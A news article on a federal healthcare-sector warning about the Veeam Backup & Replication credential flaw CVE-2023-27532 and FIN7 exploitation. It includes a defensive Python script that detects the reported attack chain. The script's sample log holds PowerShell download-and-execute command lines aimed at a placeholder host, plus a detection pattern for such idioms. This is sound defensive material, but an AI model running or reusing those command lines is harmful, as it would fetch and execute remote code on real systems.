HC3 warns of Veeam software vulnerability targeting encrypted credentials

According to the vendor, an unauthenticated user with network access to the backup infrastructure perimeter can reach a Veeam Backup & Replication server and obtain the encrypted credentials stored in its configuration database.


After an increasing number of cyberattacks exploiting a Veeam Backup & Replication software vulnerability, tracked as CVE-2023-27532, the Health Sector Cybersecurity Coordination Center recommends that all healthcare organization users keep systems up to date and patch vulnerabilities.

“What makes this threat significant is that in addition to backing up and recovering VMs, it is used to protect and restore individual files and applications for environments such as Microsoft Exchange and SharePoint, which are used in the HPH sector,” the agency said in a May 10 analysis note.

The software also has the ability to provide transaction-level restores of Oracle and Microsoft SQL databases. 

Veeam issued a warning to its customers on March 7, noting the vulnerable process is Veeam.Backup.Service.exe – TCP 9401 by default – and advising them to update their software.

WithSecure Labs identified FIN7 – a financially motivated cybercrime group – in recent attacks on Veeam servers.

“On 28th March 2023, initial activity was observed across internet-facing servers running Veeam Backup & Replication software,” according to its website.

“An SQL server process ‘sqlservr.exe’ related to the Veeam Backup instance executed a shell command, which performed in-memory download and execution of a PowerShell script.”

The threat actor tested lateral movement with exfiltrated credentials, WithSecure Labs noted.
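The WithSecure observation quoted above (the Veeam-related SQL Server process spawning a shell, which in turn pulled a PowerShell script into memory) translates directly into a host-based detection. The script below is an added example written for this article, not code from Veeam, WithSecure or HC3. It parses a constructed, hypothetical pipe-delimited process-creation log (timestamp, host, parent image, child image, command line; the file paths, hostnames, timestamps and the `placeholder.invalid` URL are all made up) and flags two things a defender would want to see: a `sqlservr.exe` parent launching a command shell on a backup server, and any shell command line carrying in-memory download-and-execute indicators.

```python
"""Flag the process chain WithSecure describes on Veeam Backup & Replication servers:
sqlservr.exe -> shell -> PowerShell in-memory download and execution.

Added example; the log format below is hypothetical and all sample events are constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample events (hypothetical format: timestamp|host|parent_image|image|command_line).
SAMPLE_EVENTS = r"""
2023-03-28T02:14:05Z|VBR01|C:\Program Files\Microsoft SQL Server\MSSQL15.VEEAMSQL2016\MSSQL\Binn\sqlservr.exe|C:\Windows\System32\cmd.exe|cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA
2023-03-28T02:14:06Z|VBR01|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a.ps1')
2023-03-28T02:20:11Z|VBR01|C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe|C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Manager.exe|Veeam.Backup.Manager.exe
2023-03-28T03:00:00Z|VBR01|C:\Program Files\Microsoft SQL Server\MSSQL15.VEEAMSQL2016\MSSQL\Binn\sqlservr.exe|C:\Windows\System32\cmd.exe|cmd.exe /c whoami
"""

# Command interpreters a database engine has no business spawning on a backup server.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Common PowerShell idioms for fetching and running code without touching disk.
DOWNLOAD_EXEC = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)


@dataclass
class Event:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str

    @property
    def parent_name(self) -> str:
        return self.parent_image.rsplit("\\", 1)[-1].lower()

    @property
    def image_name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list[Event]:
    """Parse the pipe-delimited log; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|", 4)  # command line may itself contain no '|' here, but cap the split anyway
        if len(parts) != 5:
            continue
        events.append(Event(*parts))
    return events


def detect(events: list[Event]) -> list[dict]:
    """Return one finding per event that matches at least one rule, in log order."""
    findings = []
    for ev in events:
        rules = []
        # Rule 1: SQL Server process spawning a shell (the first step WithSecure observed).
        if ev.parent_name == "sqlservr.exe" and ev.image_name in SHELLS:
            rules.append("sqlservr_spawns_shell")
        # Rule 2: a shell whose command line shows in-memory download/execution.
        if ev.image_name in SHELLS and DOWNLOAD_EXEC.search(ev.command_line):
            rules.append("shell_download_exec")
        if rules:
            findings.append(
                {"timestamp": ev.timestamp, "host": ev.host, "image": ev.image_name, "rules": rules}
            )
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{f['timestamp']} {f['host']} {f['image']}: {', '.join(f['rules'])}")
```

Run against the constructed events, the benign Veeam.Backup.Service.exe event passes and the other three are flagged; the `whoami` event shows why rule 1 matters on its own, since a shell spawned by `sqlservr.exe` is suspicious before any download indicator appears. In a real deployment the parser would be swapped for the SIEM or EDR query language in use, and the rules kept as-is.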


Whether it’s with phishing scams, exploiting vulnerabilities to steal credentials or leveraging insider threat schemes, hospitals, health plans and other healthcare organizations are prime targets for bad actors always looking for an easy way into a network.

“Organizations should review their identity and access management implementations to force use of multifactor authentication,” advised John Hendley, head of strategy at IBM Security X-Force, in a 2022 data breach cost report. 

“Just this one step greatly helps curb cybercriminals’ ability to use stolen credentials, which is one of their favorite methods of initial compromise.” 


“HC3 recommends that all HPH sector entities remain vigilant and aware of suspicious activity, keep systems up to date and immediately patch any vulnerable systems,” the agency said in the alert note. 

“In addition to this, organizations are encouraged to take a proactive approach by using CISA’s free cybersecurity services and tools to strengthen their cyber posture.”

Andrea Fox is senior editor of Healthcare IT News.

Healthcare IT News is a HIMSS Media publication.
